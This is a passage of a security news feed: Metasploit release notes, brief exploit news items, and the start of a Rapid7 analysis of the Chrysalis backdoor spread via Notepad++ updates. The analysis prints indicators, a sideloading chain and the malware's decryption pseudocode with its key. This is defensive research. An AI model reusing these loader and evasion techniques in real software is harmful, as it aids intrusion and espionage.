Metasploit modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20886">#20886</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Updates services to now also have child services. This allows for more detailed reporting for the services and vulns commands which can now report parent -&gt; child services e.g. SSL -&gt; HTTPS.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20895">#20895</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds negative caching to the LDAP entry cache so missing objects are recorded and subsequent lookups by DN, sAMAccountName, or SID return nil without re-querying the directory.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20934">#20934</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&amp;CK tags to modules related to LDAP and AD CS. This enables users to find this content using Metasploit's search functionality and the att&amp;ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20935">#20935</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds the MITRE ATT&amp;CK tag T1558.003 to the kerberoast modules. This enables users to find this content using Metasploit's search functionality and the att&amp;ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20936">#20936</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&amp;CK tags to SMB modules related to accounts. This enables users to find the content by using Metasploit's search capability and the att&amp;ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20937">#20937</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&amp;CK tags to the two existing SCCM modules that fetch NAA credentials using different techniques. This enables users to find this content using Metasploit's search functionality and the att&amp;ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20941">#20941</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds a MITRE ATT&amp;CK technique reference to the Windows password cracking module to support ATT&amp;CK‑driven discovery.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20942">#20942</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds MITRE ATT&amp;CK technique references to getsystem, cve_2020_1472_zerologon, and atlassian_confluence_rce_cve_2023_22527 modules to support ATT&amp;CK‑driven discovery.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20943">#20943</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds affected versions the description in the ‎exploits/unix/webapp/twiki_maketext module.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20599">#20599</a> from <a href="https://github.com/BenoitDePaoli">BenoitDePaoli</a> - Fixes an issue where running services -p &lt;ports&gt; -u -R to set RHOSTS with values from the database could lead to a silently failing file not found error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20775">#20775</a> from <a href="https://github.com/rmtsixq">rmtsixq</a> - Fixes a database initialization failure when using msfdb init with the --connection-string option to connect to PostgreSQL 15+ instances (e.g., Docker containers).</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20817">#20817</a> from <a href="https://github.com/randomstr1ng">randomstr1ng</a> - Adds a fix to ensure the output of sap_router_portscanner no longer causes module crashes.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20903">#20903</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Fixes an issue so #enum_user_directories no longer returns duplicate directories.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20906">#20906</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Implements a fix for SSH command shells dying on cmd_exec when a trailing newline was present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20953">#20953</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Improves the stability of socket channeling support for SSH sessions opened via scanner/ssh/ssh_login.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20955">#20955</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Ensures the cleanup of temporarily created RHOST files when using the services -p &lt;ports&gt; -u -R command to set RHOST values from the database.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-04T14%3A20%3A14-05%3A00..2026-02-13T12%3A01%3A15Z%22">Pull Requests 6.4.112...6.4.114</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.112...6.4.114">Full diff 6.4.112...6.4.114</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zen-AI-Pentest: Open-source AI-powered penetration testing framework]]></title>
<description><![CDATA[Zen-AI-Pentest provides an open-source framework for scanning and exercising systems using a combination of autonomous agents and standard security utilities. The project aims to let users run an orchestrated sequence of reconnaissance, vulnerability scanning, exploitation, and reporting using AI...]]></description>
<link>https://tsecurity.de/de/3280836/it-security-nachrichten/zen-ai-pentest-open-source-ai-powered-penetration-testing-framework/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3280836/it-security-nachrichten/zen-ai-pentest-open-source-ai-powered-penetration-testing-framework/</guid>
<pubDate>Wed, 11 Feb 2026 07:21:41 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Zen-AI-Pentest provides an open-source framework for scanning and exercising systems using a combination of autonomous agents and standard security utilities. The project aims to let users run an orchestrated sequence of reconnaissance, vulnerability scanning, exploitation, and reporting using AI guidance and industry tools like Nmap and Metasploit. It is written to support command line, API, and web interfaces. Multi-agent structure and integrated tools Zen-AI-Pentest organizes its functionality around a set of agents that handle discrete … <a href="https://www.helpnetsecurity.com/2026/02/11/zen-ai-pentest-open-source-penetration-testing-framework/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/02/11/zen-ai-pentest-open-source-penetration-testing-framework/">Zen-AI-Pentest: Open-source AI-powered penetration testing framework</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 02/06/2026]]></title>
<description><![CDATA[Google Summer of Code 2026Our very own Jack Heysel has added some documentation which outlines the Metasploit Framework project ideas for GSoC 2026. For anyone interested in applying please see GSoC-How-To-Apply documentation, or reach out on slack to any of the following GSoC mentors on Slack vi...]]></description>
<link>https://tsecurity.de/de/3273342/it-security-nachrichten/metasploit-wrap-up-02062026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3273342/it-security-nachrichten/metasploit-wrap-up-02062026/</guid>
<pubDate>Fri, 06 Feb 2026 20:20:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>Google Summer of Code 2026</h2><p>Our very own Jack Heysel has added some <a href="https://github.com/rapid7/metasploit-framework/pull/20910">documentation</a> which outlines the Metasploit Framework project ideas for GSoC 2026. For anyone interested in applying please see <a href="https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/How-to-Apply-to-GSoC.md">GSoC-How-To-Apply</a> documentation, or reach out on slack to any of the following GSoC mentors on Slack via the <a href="https://metasploit.slack.com/">Metasploit Slack</a>: @jheysel, @zeroSteiner, @h00die</p><h2>Gladinet</h2><p>This week <a href="https://github.com/Chocapikk">Chocapikk</a> has added some Gladinet CentreStack/Triofox exploitation capabilities. Adding two auxiliary modules and updating an existing exploit. The updated exploit module now accepts a custom MACHINEKEY option to leverage newly discovered vulnerabilities that allow the extraction of machineKeys from Web.config files. The gladinet_storage_path_traversal_cve_2025_11371 module exploits path traversal to read arbitrary files and extract machineKeys, while gladinet_storage_access_ticket_forge forges access tickets using hardcoded cryptographic keys.</p><h2>New module content (1)</h2><h3>Gladinet CentreStack/Triofox Access Ticket Forge</h3><p>Authors: Huntress Team, Julien Voisin, and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> Type: Auxiliary Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20768">#20768</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> Path: gather/gladinet_storage_access_ticket_forge</p><p>Description: This adds two auxiliary modules for Gladinet CentreStack/Triofox. Both modules can read arbitrary files and extract the machineKey, which is used to secure ASP.NET ViewState data. Furthermore, this change also includes a new mixin for Gladinet.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20739">#20739</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - This adds MITRE ATT&amp;CK metadata tags to modules relating to Kerberos and unconstrained delegation. This enables users to search for the content based on the ATT&amp;CK technique ID.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20882">#20882</a> from <a href="https://github.com/karanabe">karanabe</a> - Adds the RSAKeySize advanced option and uses it when generating the CSR key pair, allowing users to increase key size to meet certificate template minimums and avoid CERTSRV_E_KEY_LENGTH errors when 2048-bit keys are rejected.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20883">#20883</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Updates Kerberos modules to present a user friendly message when the user specifies the IMPERSONATE option when running a module but also forgets to specify IMPERSONATION_TYPE.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20368">#20368</a> from <a href="https://github.com/isaac-app-dev">isaac-app-dev</a> - Fixes an issue that caused msfvenom to break if it were run from alternative directories.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20680">#20680</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Improves the RPC API with multiple fixes and enhancements.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20834">#20834</a> from <a href="https://github.com/kuklycs">kuklycs</a> - This fixes the NoMethodError in the team_viewer post module, caused by misuse of the each_key method. The keys array has been updated to a 1-D array to simplify the logic.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20916">#20916</a> from <a href="https://github.com/Chepycou">Chepycou</a> - Fixes a crash when running the SAP modules sap_soap_rfc_system_info or sap_icf_public_info.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20920">#20920</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This fixes a bug in password cracking modules where the auto action would crash even when the path to a compatible executable was specified in CRACKER_PATH.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20910">#20910</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This adds documentation regarding the projects for which we are soliciting submissions for as part of the Google Summer of Code program.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-29T15%3A38%3A16Z..2026-02-04T14%3A20%3A14-05%3A00%22">Pull Requests 6.4.111...6.4.112</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.111...6.4.112">Full diff 6.4.111...6.4.112</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 acquires Metasploit open source project]]></title>
<description><![CDATA[Rapid7, the vulnerability management security specialist, has acquired Metasploit, the ongoing open source security project that developed the Metasploit Framework. The move is billed as allowing Rapid7 to enhance its penetration testing technologies.]]></description>
<link>https://tsecurity.de/de/3272307/it-security-nachrichten/rapid7-acquires-metasploit-open-source-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3272307/it-security-nachrichten/rapid7-acquires-metasploit-open-source-project/</guid>
<pubDate>Fri, 06 Feb 2026 14:23:37 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Rapid7, the vulnerability management security specialist, has acquired Metasploit, the ongoing open source security project that developed the Metasploit Framework. The move is billed as allowing Rapid7 to enhance its penetration testing technologies.]]></content:encoded>
</item>
<item>
<title><![CDATA[Internet Explorer zero-day code goes public]]></title>
<description><![CDATA[The Internet Explorer exploit code used in the Operation Aurora attack against Google and other technology companies has made it into the public domain, and has been incorporated into the Metasploit penetration testing tool, it was revealed this weekend.]]></description>
<link>https://tsecurity.de/de/3272147/it-security-nachrichten/internet-explorer-zero-day-code-goes-public/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3272147/it-security-nachrichten/internet-explorer-zero-day-code-goes-public/</guid>
<pubDate>Fri, 06 Feb 2026 14:22:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Internet Explorer exploit code used in the Operation Aurora attack against Google and other technology companies has made it into the public domain, and has been incorporated into the Metasploit penetration testing tool, it was revealed this weekend.]]></content:encoded>
</item>
<item>
<title><![CDATA[70% of Android Devices Vulnerable to a Remote Exploit]]></title>
<description><![CDATA[Rapid7's Metasploit researchers have developed a new exploit for an old vulnerability that remains pervasive in the Android ecosystem some 9 months after it was patched by Google. With this new code, 70% of all Android users are vulnerable to a little social engineering and a remote takeover.]]></description>
<link>https://tsecurity.de/de/3268883/it-security-nachrichten/70-of-android-devices-vulnerable-to-a-remote-exploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3268883/it-security-nachrichten/70-of-android-devices-vulnerable-to-a-remote-exploit/</guid>
<pubDate>Fri, 06 Feb 2026 14:07:49 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Rapid7's Metasploit researchers have developed a new exploit for an old vulnerability that remains pervasive in the Android ecosystem some 9 months after it was patched by Google. With this new code, 70% of all Android users are vulnerable to a little social engineering and a remote takeover.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Flaw Spells ‘Privacy Disaster’ for 75% of Phones]]></title>
<description><![CDATA[Metasploit researcher wants to motivate community to think of a solution]]></description>
<link>https://tsecurity.de/de/3268486/it-security-nachrichten/android-flaw-spells-privacy-disaster-for-75-of-phones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3268486/it-security-nachrichten/android-flaw-spells-privacy-disaster-for-75-of-phones/</guid>
<pubDate>Fri, 06 Feb 2026 14:06:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Metasploit researcher wants to motivate community to think of a solution]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Update Extends Pen Testing to IoT]]></title>
<description><![CDATA[Popular open source framework gets a hardware bridge]]></description>
<link>https://tsecurity.de/de/3266411/it-security-nachrichten/metasploit-update-extends-pen-testing-to-iot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3266411/it-security-nachrichten/metasploit-update-extends-pen-testing-to-iot/</guid>
<pubDate>Fri, 06 Feb 2026 13:55:00 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Popular open source framework gets a hardware bridge]]></content:encoded>
</item>
<item>
<title><![CDATA[Samba Exploit Spreads Bitcoin Miners]]></title>
<description><![CDATA[The exploit incorporates advanced functionality that was barely released in the Metasploit framework a week ago.]]></description>
<link>https://tsecurity.de/de/3266083/it-security-nachrichten/samba-exploit-spreads-bitcoin-miners/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3266083/it-security-nachrichten/samba-exploit-spreads-bitcoin-miners/</guid>
<pubDate>Fri, 06 Feb 2026 13:53:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The exploit incorporates advanced functionality that was barely released in the Metasploit framework a week ago.]]></content:encoded>
</item>
<item>
<title><![CDATA[Afghan-Based Attack Disguised as News]]></title>
<description><![CDATA[Attackers use Metasploit to target victims with malware.]]></description>
<link>https://tsecurity.de/de/3264811/it-security-nachrichten/afghan-based-attack-disguised-as-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3264811/it-security-nachrichten/afghan-based-attack-disguised-as-news/</guid>
<pubDate>Fri, 06 Feb 2026 13:44:19 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Attackers use Metasploit to target victims with malware.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Deploy Open-Source Tool Sliver C2, Replacing Cobalt Strike, Metasploit]]></title>
<description><![CDATA[Sliver is gaining popularity due to its modular capabilities and cross-platform support]]></description>
<link>https://tsecurity.de/de/3257965/it-security-nachrichten/hackers-deploy-open-source-tool-sliver-c2-replacing-cobalt-strike-metasploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3257965/it-security-nachrichten/hackers-deploy-open-source-tool-sliver-c2-replacing-cobalt-strike-metasploit/</guid>
<pubDate>Fri, 06 Feb 2026 12:32:16 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sliver is gaining popularity due to its modular capabilities and cross-platform support]]></content:encoded>
</item>
<item>
<title><![CDATA[The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit]]></title>
<description><![CDATA[Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central Am...]]></description>
<link>https://tsecurity.de/de/3248725/it-security-nachrichten/the-chrysalis-backdoor-a-deep-dive-into-lotus-blossoms-toolkit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3248725/it-security-nachrichten/the-chrysalis-backdoor-a-deep-dive-into-lotus-blossoms-toolkit/</guid>
<pubDate>Mon, 02 Feb 2026 17:05:19 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central America, focusing on government, telecom, aviation, critical infrastructure, and media sectors.</span></p><p><span>Our investigation identified a security incident stemming from a sophisticated compromise of the infrastructure hosting Notepad++, which was subsequently used to deliver a previously undocumented custom backdoor</span><span>, which we have dubbed </span><span><span data-type="inlineCode">Chrysalis</span></span><span>.</span></p><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78d5255e4bec3077/6980bb18831fe853231a96c6/lotus-blossom-telemetry.jpg" alt="lotus-blossom-telemetry.jpg" caption="Figure 1: Telemetry on the custom backdoor samples" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-telemetry.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78d5255e4bec3077/6980bb18831fe853231a96c6/lotus-blossom-telemetry.jpg" data-sys-asset-uid="blt78d5255e4bec3077" data-sys-asset-filename="lotus-blossom-telemetry.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 1: Telemetry on the custom backdoor samples" data-sys-asset-alt="lotus-blossom-telemetry.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Telemetry on the custom backdoor samples</figcaption></div></figure><p>⠀</p><p><span>Beyond the discovery of the new implant, forensic evidence led us to uncover several custom loaders in the wild. One sample, </span><span><em>“ConsoleApplication2.exe”</em></span><span>, stands out for its use of Microsoft Warbird, a complex code protection framework, to hide shellcode execution. This blog provides a deep technical analysis of Chrysalis, the Warbird loader, and the broader tactic of mixing straightforward loaders with obscure, undocumented system calls.</span></p><h2>Initial access vector</h2><p>Forensic analysis conducted by the MDR team suggests that the initial access vector aligns with publicly disclosed abuse of the Notepad++ distribution infrastructure. While <a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/"><span>reporting</span></a> references both plugin replacement and updater-related mechanisms, no definitive artifacts were identified to confirm exploitation of either. The only confirmed behavior is that execution of <em>“notepad++.exe”</em>  and subsequently <em>“GUP.exe”</em> preceded the execution of a suspicious process <em>“update.exe”</em> which was downloaded from 95.179.213.0.</p><h2>Analysis of update.exe</h2><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4fbd1b5b4e1bd25/6980bb9d090b8315c274c37c/lotus-blossom-execution-diagram-of-update-exe.png" alt="lotus-blossom-execution-diagram-of-update-exe.png" caption="Figure 2: Execution diagram of update.exe" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4fbd1b5b4e1bd25/6980bb9d090b8315c274c37c/lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-uid="bltd4fbd1b5b4e1bd25" data-sys-asset-filename="lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Execution diagram of update.exe" data-sys-asset-alt="lotus-blossom-execution-diagram-of-update-exe.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 2: Execution diagram of update.exe</figcaption></div></figure><p>⠀</p><p><span>Analysis of</span><span><em> “update.exe”</em></span><span> shows the file is actually an NSIS installer, a tool commonly used  by </span><a href="https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/"><span>Chinese APT</span></a><span> to deliver initial payload.</span></p><p><span>The following (Table 1) are the extracted NSIS installer files:</span></p><table><colgroup data-width="750"><col><col><col></colgroup><tbody><tr><td><p><span><strong>File name</strong></span></p></td><td><p><span><strong>Description</strong></span></p></td><td><p><span><strong>SHA-256 </strong></span></p></td></tr><tr><td><p><span>[NSIS].nsi</span></p></td><td><p><span>NSIS </span><span>Installation script</span></p></td><td><p><span>8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e</span></p></td></tr><tr><td><p><span>BluetoothService.exe</span></p></td><td><p><span>Renamed Bitdefender Submission Wizard used for DLL sideloading</span></p></td><td><p><span>2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924</span></p></td></tr><tr><td><p><span>BluetoothService</span></p></td><td><p><span>Encrypted shellcode</span></p><p></p></td><td><p><span>77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e</span></p></td></tr><tr><td><p><span>log.dll</span></p></td><td><p><span>Malicious DLL sideloaded by BluetoothService.exe</span></p></td><td><p><span>3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad</span></p></td></tr></tbody></table><p>⠀</p><p><span>Installation script is instructed to create a new directory </span><span><em>“Bluetooth”</em></span><span><strong> </strong></span><span>in </span><span><em>“%AppData%”</em></span><span><strong> </strong></span><span>folder, copy the remaining files there, change the attribute of the directory to </span><span><span data-type="inlineCode"><strong>HIDDEN</strong></span></span><span><strong> </strong></span><span>and execute </span><span><span data-type="inlineCode"><em>BluetoothService.exe</em></span></span><span><em>.</em></span></p><h3>DLL sideloading</h3><p><span>Shortly after the execution of </span><span><span data-type="inlineCode"><em>BluetoothService.exe</em></span></span><span><em> </em></span><span>which is actually a renamed legitimate </span><span><span data-type="inlineCode"><em>Bitdefender Submission Wizard</em></span></span><span> that was abused for </span><span><span data-type="inlineCode"><strong>DLL sideloading</strong></span></span><span>, where a malicious </span><span><span data-type="inlineCode"><em>log.dll</em></span></span><span> was placed alongside the executable, causing it to be loaded instead of the legitimate library. Two exported functions from </span><span><span data-type="inlineCode"><em>log.dll</em></span></span><span> are called by </span><span><span data-type="inlineCode"><em>Bitdefender Submission Wizard</em></span></span><span>: </span><span><span data-type="inlineCode"><strong>LogInit</strong></span></span><span><strong> </strong></span><span>and </span><span><span data-type="inlineCode"><strong>LogWrite</strong></span></span><span>.</span></p><h3>LogInit and LogWrite - Shellcode load, decrypt, execute</h3><p><span><span data-type="inlineCode"><strong>LogInit</strong></span></span><span><strong>  </strong></span><span>just loads </span><span><span data-type="inlineCode"><em>BluetoothService</em></span></span><span><em> </em></span><span>into the memory of the running process.</span></p><p><span><span data-type="inlineCode"><strong>LogWrite</strong></span></span><span><strong> </strong></span><span>has a more sophisticated goal – to decrypt and execute the shellcode.</span></p><p><span>The decryption routine implements a custom runtime decryption mechanism used to unpack encrypted data in memory. It derives key material from previously calculated hash value and applies a stream‑cipher–like algorithm rather than standard cryptographic APIs. At a high level, the decryption routine relies on a linear congruential generator, with the standard constants </span><span><span data-type="inlineCode"><strong>0x19660D</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>0x3C6EF35F</strong></span></span><span>, combined with several basic data transformation steps to recover the plaintext payload.</span></p><p><span>Once decrypted, the payload replaces the original buffer and all temporary memory is released. Execution is then transferred to this newly decrypted stage, which is treated as executable code and invoked with a predefined set of arguments, including runtime context and resolved API information.</span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17e6d0b98986647a/6980bcf7c302595bc9cb786f/lotus-blossom-LogWrite-internals.png" alt="lotus-blossom-LogWrite-internals.png" caption="Figure 3: LogWrite internals" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-LogWrite-internals.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17e6d0b98986647a/6980bcf7c302595bc9cb786f/lotus-blossom-LogWrite-internals.png" data-sys-asset-uid="blt17e6d0b98986647a" data-sys-asset-filename="lotus-blossom-LogWrite-internals.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: LogWrite internals" data-sys-asset-alt="lotus-blossom-LogWrite-internals.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: LogWrite internals</figcaption></div></figure><h3>IAT resolution</h3><p><span><span data-type="inlineCode"><strong>Log.dll</strong></span></span><span><strong> </strong></span><span>implements an API hashing subroutine to resolve required APIs during execution, reducing the likelihood of detection by antivirus and other security solutions.</span></p><h3>API hashing subroutine</h3><p><span>The hashing algorithm will hash export names using </span><span><span data-type="inlineCode"><strong>FNV‑1a</strong></span></span><span><strong> </strong></span><span>(fnv-1a hash 0x811C9DC5, fnv-1a prime 0x1000193 observed), then apply a </span><span><span data-type="inlineCode"><strong>MurmurHash‑style avalanche finalizer</strong></span></span><span><strong> </strong></span><span>(murmur constant 0x85EBCA6B observed), and comparing the result to a salted target hash.</span></p><h2>Analysis of the Chrysalis backdoor</h2><p><span>The shellcode, once decrypted by </span><span><span data-type="inlineCode"><em>log.dll</em></span></span><span><em>,</em></span><span> is a custom, feature-rich backdoor we've named “</span><span><em>Chrysalis</em></span><span>”. Its wide array of capabilities indicates it is a sophisticated and permanent tool, not a simple throwaway utility. It uses legitimate binaries to sideload a crafted DLL with a generic name, which makes simple filename-based detection unreliable. It relies on custom API hashing in both the loader and the main module, each with its own resolution logic. This is paired with layered obfuscation and a fairly structured approach to C2 communication. Overall, the sample looks like something that has been actively developed over time, and we’ll be keeping an eye on this family and any future variants that show up.</span></p><h3>Decryption of the main module</h3><p><span>Once the execution is passed to decrypted shellcode from </span><span><span data-type="inlineCode"><em>log.dll</em></span></span><span><em>,</em></span><span> malware starts with decryption of the main module via a simple combination of XOR, addition and subtraction operations, with a hardcoded key </span><span><span data-type="inlineCode"><strong>gQ2JR&amp;9;</strong></span></span><span>. See below the p</span>seudocode of decryption routine:</p><p>⠀</p><pre language="cpp">char XORKey[8] = "gQ2JR&amp;9;";
DWORD counter = 0;
DWORD pos = BufferPosition;

while (counter &lt; size) {
    BYTE k = XORKey[counter &amp; 7];
    BYTE x = encrypted[pos];

    x = x + k;
    x = x ^ k;
    x = x - k;

    decrypted[pos] = x;

    pos++;
    counter++;
}</pre><p>⠀</p><p><span>XOR operation is performed 5 times in total, suggesting a section layout similar to PE format. Following the decryption, malware will proceed to yet another dynamic IAT resolution using </span><span><span data-type="inlineCode"><strong>LoadLibraryA</strong></span></span><span><strong> </strong></span><span>to acquire a handle to </span><span><span data-type="inlineCode"><strong>Kernel32.dll</strong></span></span><span> and </span><span><span data-type="inlineCode"><strong>GetProcAddress</strong></span></span><span>. Once exports are resolved, the jump is taken to the main module.</span></p><h3>Main module</h3><p><span>The decrypted module is a reflective </span><span><span data-type="inlineCode"><strong>PE-like</strong></span></span><span> module that executes the </span><span><span data-type="inlineCode"><strong>MSVC CRT</strong></span></span><span><strong> </strong></span><span>initialization sequence before transferring control to the program’s main entry point. Once in the Main function, the malware will dynamically load DLLs in the following order : </span><span><span data-type="inlineCode"><strong>oleaut32.dll</strong></span></span><span>, </span><span><span data-type="inlineCode"><strong>advapi32.dll</strong></span></span><span>,  </span><span><span data-type="inlineCode"><strong>shlwapi.dll</strong></span></span><span>, </span><span><span data-type="inlineCode"><strong>user32.dll</strong></span></span><span>, 